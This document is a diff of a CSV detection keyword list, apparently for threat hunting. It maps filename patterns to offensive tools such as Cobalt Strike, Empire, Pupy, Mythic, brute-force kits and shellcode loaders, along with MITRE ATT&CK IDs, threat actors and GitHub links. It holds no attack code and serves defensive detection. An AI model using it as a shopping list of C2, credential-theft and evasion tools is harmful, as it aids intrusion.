utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/inline_syscall.git*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" "*/inline_syscall/include/in_memory_init.hpp*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" -"*/inline-exec/*.exe","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" +"*/inline-exec/*.exe","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" "*/InlineWhispers*","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/InlineWhispers","1","1","N/A","10","10","286","42","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z" "*/insta-bf.git*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/insta-bf","1","1","N/A","7","1","39","6","2021-12-23T17:41:12Z","2020-11-20T22:22:48Z" "*/instabf.py*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/insta-bf","1","1","N/A","7","1","39","6","2021-12-23T17:41:12Z","2020-11-20T22:22:48Z" -"*/instabrute.py*","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","7","665","261","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" +"*/instabrute.py*","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","7","666","261","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" "*/instainsane.git*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/umeshshinde19/instainsane","1","1","N/A","7","5","473","329","2023-08-22T21:49:22Z","2018-12-02T22:48:11Z" "*/instainsane.sh*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/umeshshinde19/instainsane","1","1","N/A","7","5","473","329","2023-08-22T21:49:22Z","2018-12-02T22:48:11Z" -"*/install-sb.sh*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","N/A","7","10","2417","268","2023-07-14T10:59:10Z","2019-03-28T18:07:05Z" +"*/install_elevated.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/install-sb.sh*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","N/A","7","10","2419","268","2023-07-14T10:59:10Z","2019-03-28T18:07:05Z" "*/insTof.py*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/insta-bf","1","1","N/A","7","1","39","6","2021-12-23T17:41:12Z","2020-11-20T22:22:48Z" -"*/interactive_shell.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*/interactsh/*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C5","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2675","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" -"*/interactsh-client*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C6","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2675","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" -"*/interactsh-collaborator*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C15","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2675","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" -"*/interactsh-server*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C8","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2675","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" +"*/interactive_shell.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/interactsh/*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C5","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2677","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" +"*/interactsh-client*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C6","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2677","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" +"*/interactsh-collaborator*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C15","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2677","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" +"*/interactsh-server*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C8","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2677","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" "*/internal/C2/*.go*","offensive_tool_keyword","GC2-sheet","GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.","T1071.002 - T1560 - T1105","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/looCiprian/GC2-sheet","1","1","N/A","10","10","449","89","2023-07-06T19:22:36Z","2021-09-15T19:06:12Z" -"*/internal/pipe/pipe.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6213","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*/internal/pipe/pipe.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" "*/Internals/Coff.cs*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" "*/Inveigh.git*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" "*/Inveigh.txt*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*/Invoke-Bof/*","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/airbus-cert/Invoke-Bof","1","1","N/A","10","10","232","32","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z" "*/Invoke-HostEnum.ps1*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/red-team-scripts","1","1","N/A","10","10","1089","197","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z" -"*/Invoke-RunAs.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1084","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/Invoke-RunAs.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1084","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/Invoke-SMBRemoting.git*","offensive_tool_keyword","Invoke-SMBRemoting","Interactive Shell and Command Execution over Named-Pipes (SMB)","T1059 - T1021.002 - T1572","TA0002 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-SMBRemoting","1","1","N/A","9","1","22","4","2023-10-02T10:21:34Z","2023-09-06T16:00:47Z" -"*/ip_spoof.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/IOXIDResolver.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/ip_spoof.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/IPayloadService.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*/ip-forwarding.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/IPfuscation.cpp*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" -"*/IPfuscation.exe*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*/IPfuscation.cpp*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" 